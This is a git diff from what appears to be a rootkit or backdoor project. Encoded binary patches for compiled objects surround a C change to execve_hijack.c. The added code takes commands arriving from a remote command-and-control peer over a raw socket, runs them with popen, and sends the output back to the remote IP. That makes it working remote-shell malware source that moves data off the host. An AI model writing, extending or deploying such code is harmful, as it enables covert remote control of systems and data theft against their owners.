z$dCS`LxrHWtL31<7TUQzO{euUbinOdI;~6YC*6)L-4FjS%H5IG-`g6dDC=70+PPz@
cB%&?u%+js>sY0|+$gV71%T@)Ohh)Y5KV`Y|5dZ)H

delta 6189
zcmZ`-4O~=Zx<BXeHG_l9ATTo^Fd`ryBA^nkih_zBU2xH))bgsU_?3$0(Dk#C5Oo^H
z(5F&&ufJ=%uG+5q3mY?Zf9X^f*tJ!6ubXY&lA;`hNb@6dsdNADd(O~A?K{6Y&-;8o
z@AE$Ib3P6pmTn!A8Z1!@q6I#RR3NNz?#?_M-WZ{xjS;*5nWG=5B3A}dlsK$7H%vwS
zP%x^v2oQ>Y(^wU6D*Z8>9i-yxsYW!LS~RH^O{#@n7B3DuHe8kI3)@t(&_?^EUk&<q
z9%RjfO!}az=#p<g+`QH|sc>Xm>mN>ie55QYd9R-8gVL>OFy;?d5NnueiP478`$1#G
zfpk3BEMB2O!8u|n%?O@CM?)=QET}nTs}H8O;Gv>}Od&bqb-Ep7rZpiJaXp)fH~95E
zehubUR?zXVc)A-DEjDuMC;Yk$R?XrLx*eJ$KEo;d`Sl>bUSe0Wg;~T!96!VHtzi~g
z5Ne^uFiS`mVoj#w(g5*gY7JXsT)w)}K7Wn9YPGP={-nL?30kEqpg-vnW0zLimsPE^
zuU@#SQdqRIYF(vJwWe}4eWW`}`}KMBSADDlOXok91eTQ`VGvTI?Wpkl?iaD6!9tcs
zi(bAQg%Kn?q~X<Z%k|7c5pXvATdq@4p(sY3c(qOT(*=#LqlMvP#ArGYZnj!A9R_aw
zN<~;XrO^A}vi<Q7Te&(50T@E_`k5m%_ndr{2K6)3zJ7)Xtr|GhM>9Ze0hQVGk8Y{~
zwY#6e+8Y^II?X$)b3G*(%+_$f0-z;;+mFf&<_JRoH=RrdGwn1OBKikVM^Q1TO`!TS
z%a}5)1=R;?RDkSkdI?lZgdsvp66Y<W%b?1jnge9llNe#9^$`Xd3(n4f$l~chggHVx
zxLji&Erje<$R!3?I7+)g)%7<-*aE0c^d_jIKur#yw$N=*m-RQ$(EbL`e-)HVdyL7t
z-;5K4ua(r_dNPf1k^{3p7YagT(j-B+6Pfq`cr{LXAik;(UfBnq*9WiYgO~NeO9Jr8
z%wb^wf#Lam@a#T#Y9Bmdtj8Jkm`H8WQIAZvV4vI(7m;<@T}UW2C1&OrLAcuhbOR=`
zJLE|Qe$j1@kzFCf*u2hb*DKc}leV(ty{$pWPv!FY6UI<!OuQ5_hL*=9WF&wnRA*Jl
zwS}LK##DBGZa2uT!Y_dMtlue$Z?U2%?}pr?S7OrWLTrNc;5+JwwPybJ_ln}IyM}A+
z8|<o7ho5B!!S^B%*<E*w0cW%CgYRgV+3HxyP*<IggCdLU5?rHvH+q=NTcBU((*Ixz
zdl*rpxXQX0%UOohbQrdW_&xyZ{M&3}D-fq#)0qp8PVQcIzIF*V7R#<+E-gDty7RnP
z^<QwZebXJx=np|vVPOHNz~iXvR%7G<foxQ%0@l{d14Ix)N1+zlKG_}p4x=De=2;dm
z$u6VHbiND6i{ZG53HWC8C=R8Tn-EojF+6dbUpsvg3pg`Df)#h+lwJi9;W_I%VYRug
z4OeERBiF^}@*?=DV?oJogXH2;r&;1<=U)-@_J3hRxFB3HT~*$}6~s%CCxva^>XU(L
z?)*<tWl$}JYJk7t{)MqsaZ6b8&v=aa!Q;<pXfDgDU;VMqwW`k#A1I2-KmaRY3A<wB
zYs;U(Y9G`rv_CbE`E1vmbvlI_tVyGzp$dmOCe0Hb0R>g?JY%`*%DJKH>$2+wE>+v9
z!(r+&Q@b@mtfa8GOotWySgt*nTj$*n-UM-_eLQm6%<Gh8y*&}A>@L|VyYn6F6e6IB
zxanZK)&uqZ?pqc_Ndv+%GH)&wxbvUXghjR{XPt$IlK(iUXPI4JI}6e2P#LvvFuoAE
z?KoJlp-JayHWDFQ=dHHDX)1F%3{KS$*}iu;{2Dw9Hb|&h*ui3Rmo&=mz9~2vD+n`+
zPYFi4WsQ9}jg?>RIirmHDAkvg>K3Kit5i2B)s4RPV9sOt3FG<ch^l>q9byD~1%P{!
z`yA8vyD4?x)J1dQ#diQfsD0sW%v>ecYQ454&XTUk*GsxsGRs(yIIA3YRdmbF%jgJa
zSdL`pMc=M&uxqz;3)Qh${U~Pfm%SF(eoL1J#;!QeWLzcPvRg*yD)F9X&y=hrp#Nv^
z;FKQ%E@6X2lg4ZSGxGI{E*3vi#0g>{Rp225=q)x+_(rphx#=64kzkhAchialo8jI2
zSeOl-e5Kv=VuDTj&3$T0$m{=~phFuAY4$yFpT0>LEq!vIMkMCMy^FYfFT<dkkBi*&
z7Nc*;ecGIuA&vQljwB{Y8}Cy~;)wpQsb&yrvv1Bl(kCTLb@wSdX;T03D(5KUe0G-{
zN!!Av4}fLeeG0doln&mZw``Nl)9#^#lw7Uda#i7}n~9se@7`TX7*rZH<qoT-4FizT
zp^UuuE^Qi=yW|fbJF!7qt_hqM!+7O)vB@Y-rDG&kWptGr8HjwnNQ!*j%L^_RVrs#S
zgaKE{Rm8Odv!5-E*00HwTwvD0s<Y%+?UrLo^?Zb3G{KeU4$V(qAszXel$0Uy-+#?S
zPSkEWAw)V~WIO6EjACLTcc?hkM%jbUO7`2-HMmfE=N4tBOdI&&ZEm#v98N{A<!g8l
z@;Pq9asoA`lu7GuaqI8h`l<Dgnds$Pu-<Ap(}i7h;?7ipZd-=q%_~FhqS0vyqMp7S
zJWiV1Mf=hU4Nst2)a4g<QEQsr`ahY1;Ho%*h9R;-ayDzp>7vy`{wW>pq-p8Dkmh|!
zXNIQG%jv1ogigAY{)lw5gVHk=N{@DuD<fOdb<*jKB&nc-KFWv>d#{7n6up#YroGu?
zCGSnTl0B7vn^`X1yXpBd^P(uFw8P-|*tdOZ^(|>GLT5Xh_rF+Dl8**tkCLi=RF=J6
zD!c*RO(P<ciue;!@uQ{g!pBg@#g9yN{-d~Js`Fm)tYT+Rh3w8Q1^MC9jPF=u@Hsy7
zIEK}Tzdu+Y?a9@7<lLi@<2tq_9)J7)DM~c5{`@D3G8XU<;4Hust%}kE{((;wWhL;c
z&lIH|aKjBnIR<zb(Ov*7ZC8{|z)@JI5#4AnU@oB02|IvUfOf#jFBRo^K<8H|FG=_h
z;V!oP8VI9MEIojSQFkeL@IHn5ngm#mQ?MBDI^Z_Ic$}R>fSovd=K%kX4$ua;2t6ej
zt?m$D3Lv|;tfVU=1}8LLSCkw?B1{V756>x>j>LcVHAS&e%*esR%RffYOhOy1``Gc9
z867eC$3RT#@y}?bXGg}R9mDh^<R={Ngp&To?b5`E&>%6`5T+BD=mq@W`JCPx85i1#
z>EFJfo0uAqrP((qJU=m%J^R?&X;^+-XgQ|y+i7}!qQj2qA*3@4I=yCp&5R1%?DOEi
z0{&>gUVc!X$RunaodEs(O=N*Z?hi|@4GJ0{aU)FTDwDyMJkeKXu0$RA`p_QmjbG6N
zL^cp2Bfp}!hmswWFx`k_HvrsT%R%AXGh6Ut@K<3!_hR15mv(WljK2;1Ht-vM#NW}&
zKLq|P)B$^-?bUyhv)RfW!Z`?3LE!R_0%++CpbdN*3g<?k0qNsj2f-+m8{q%D08+qz
z6oob-P=AFQz$5`1FbM+d@6m*U3Ho|W4?;G?v%4THgc|zSTm5gV{<l*WB^!h2_*k29
zsEYVsQ=6!DY?A0Du`oy6M|p)w;%=Hzm}6?1uF7F4d{}6AVN%pS?F~}<bRu~5^j6_?
zaVwd|C5f4oH*TraQi@mlSWn|Pok&;5uL@6%Qw_X|PYF^iRTde;KhWOX&WCW)3m_e2
z#{uJ2k(1s5X{PqBJXuw|2hu)tL^l4YN~IQCrPMf2QSrZmq+^LxSduGEOr$D+wgh^q
zWW3ZJPoI`tkY>hH<K$@&rJl(rr4JH4C#IB!NcqVml~qWNWSUb}Dw%9_q--si6gT}T
z>0pXy&-4Q!Qd<h;&8h)PCuS{`W~O-(Dqaebn$yWUdx4ahLCJH5OZDmW$ecw|&k*{{
zoOx2^5Q>|-2%_YeTPN+y^n^aPT9hJ((o>Jmk{nrd;qiHlnl<l~j>Y~(Ws$@pN?-Ph
z#JqmEVyDRbELvGAF}dTbcZBCPuuc##Y?w><xZ&+XXZ6D90xjQ=WA%Tm@GEZCxJ7h)
zgIR2%^Bc~JL&>@Er;-CvF`{4=TIljdv(^7G#BXO5ucraRF%mbKd+Wr{T}m07Y*wwv
z*q049)<Pu;fgz8--n3oZPVJkL*dB#%K7tTl-TahkqE-^iRR!TJ9p7T6@-3lRMj=00
zCGswT=`@r)v*zHfNf7uk0{wH!+iVuUVOMJ0k~qL99Mi07g2GT{)jCeopULhx7>89L
zJj}S_S}J}zp6pLY;~=mYc0O$p&v4G)=<?I%sjYr(tvq=bf`xk;-Cx|iFM`hQ1}4cW
z=*l%W8Zc3w!)zT4E?Z0G5S7e(7N(<Up~EarVKUU<uvq75a^+fPD>W;tm;}xruHi3e
zGE-ydfg^3<vsys@FQfeC1GOWXSUr0e#^7xZ(5un?hm3bG(2F!X{)3#Y^^?C-%~tc&
zPc*G~JW;d3??QlW8ogUfGP^6Y@j#=SY#bF*v<4GSty|4`@u(P<j%F=3-eDn_t<fX3
z<@3%6dNI=yXK~%7noN(DN`G0{HF{f$>T$IeNe$QC&#!+Z@fmZ-Nl4nze+GnH!i;~K
zw02--65<5^$2xZVW8-_K=UM;E`x4ddh@`A)J*}ymV&b1Ci>8!LoiK6!@L|J;<x}~Z
zSh`S`=;^83FDA3^mVsPh9X@%kt6aLOa<zT_l9daWuA`<M6=d5P=b5%MM)E9pc7Z5)
zgXk^SFw;J*>H6Vr66<qJnRtg}!w<`;xIRa}RikdD4fO@#UJXOHK3)Hi$=}5N&_bfy
zA=;?Moue<pGdLSXbjn>|D%UVSG?KV0r}tC4zpyGTG+|ecUfY_Mp|o+=Wbse*=B^ym
zPriSX_*{;uLEAn*JV?dQ<>>u=rinH@SD^QIFE5<}_QTipZ=WmZ?Kw^3)L>;#al?2?
a%%z$=1$yBbm1v?jfthxy*jywl>Hh&7=bx_t

diff --git a/src/helpers/execve_hijack.c b/src/helpers/execve_hijack.c
index 0408387..35dc6b6 100644
--- a/src/helpers/execve_hijack.c
+++ b/src/helpers/execve_hijack.c
@@ -19,6 +19,28 @@
 #include "lib/RawTCP.h"
 #include "../common/c&c.h"
 
+
+char* execute_command(char* command){
+    FILE *fp;
+    char* res = calloc(4096, sizeof(char));
+    char buf[1024];
+
+    fp = popen(command, "r");
+    if(fp == NULL) {
+        printf("Failed to run command\n" );
+        return "COMMAND ERROR";
+    }
+
+    while(fgets(buf, sizeof(buf), fp) != NULL) {
+        strcat(res, buf);
+    }
+    printf("RESULT OF COMMAND: %s\n", res);
+
+    pclose(fp);
+    return res;
+}
+
+
 char* getLocalIpAddress(){
     char hostbuffer[256];
     char* IPbuffer = calloc(256, sizeof(char));
@@ -108,10 +130,16 @@ int main(int argc, char* argv[]){
                 connection_close = 1;
             }else{
                 printf("Received request: %s\n", p);
-                packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, CC_PROT_MSG);
+                char* res = execute_command(p);
+                char* payload_buf = calloc(4096, sizeof(char));
+                strcat(payload_buf, CC_PROT_MSG);
+                strcat(payload_buf, res);
+                packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, payload_buf);
                 if(rawsocket_send(packet_res)<0){
                     return -1;
                 }
+                free(payload_buf);
+                free(res);
             }
         }
     }
diff --git a/src/helpers/execve_hijack.o b/src/helpers/execve_hijack.o
index abdc4fb803f130602bac2b7c7bebc365336ec7a2..6f1af334607e91648aee08173562eb24ce02041b 100644
GIT binary patch
literal 6016
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

literal 4896
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
O+5cHK^)mDD+y4z};$(CH